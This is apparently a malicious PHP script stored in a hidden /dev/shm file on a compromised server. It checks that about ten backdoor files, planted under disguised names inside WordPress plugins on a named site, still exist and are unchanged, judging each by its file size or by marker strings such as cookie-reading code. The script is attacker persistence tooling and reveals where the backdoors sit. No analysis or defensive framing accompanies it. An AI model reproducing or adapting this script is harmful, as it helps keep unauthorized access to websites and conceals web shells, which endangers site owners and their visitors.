File: //dev/shm/.fac
<?php $r = '/home/onlyitok/eldawlya-co.com'; $x = ["/wp-content/plugins/revslider/admin/views/features/support.php"=>"bd@@186227@@_COOKIE[3]",
"/wp-content/plugins/revslider/includes/cssparser.class.php"=>"bd@@81017@@batch_process",
"/wp-content/plugins/wpforms-lite/vendor_prefixed/ezyang/htmlpurifier/library/HTMLPurifier/ConfigSchema/Interchange/zipdownloader.php"=>"bd@@186253@@669",
"/wp-content/plugins/ml-slider/lib/htmlpurifier/library/HTMLPurifier/Node/module_disabled.php"=>"bd@@186254@@592",
"/wp-content/plugins/google-analytics-for-wordpress/includes/gutenberg/headline-tool/phpinsight/lib/graphjpgraph.php"=>"bd@@186255@@664",
"/wp-content/plugins/all-in-one-seo-pack-old/app/Common/Views/sitemap/xsl/cfdg.php"=>"bd@@186256@@1511",
"/wp-content/plugins/redux-framework/redux-core/assets/css/colors/ocean/Decorator.php"=>"bd@@186257@@563",
"/wp-content/plugins/wpforms-lite/vendor_prefixed/ezyang/htmlpurifier/library/HTMLPurifier/Token/AttrValidator.php"=>"bd@@185789@@1560",
"/wp-content/plugins/wpforms-lite/src/Integrations/Stripe/Admin/Builder/Traits/trade.notify.php"=>"bd@@185790@@681",
"/wp-content/plugins/all-in-one-seo-pack-old/vendor/woocommerce/action-scheduler/classes/schedules/ActionScheduler.NullSchedule.php"=>"bd@@185791@@2258"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');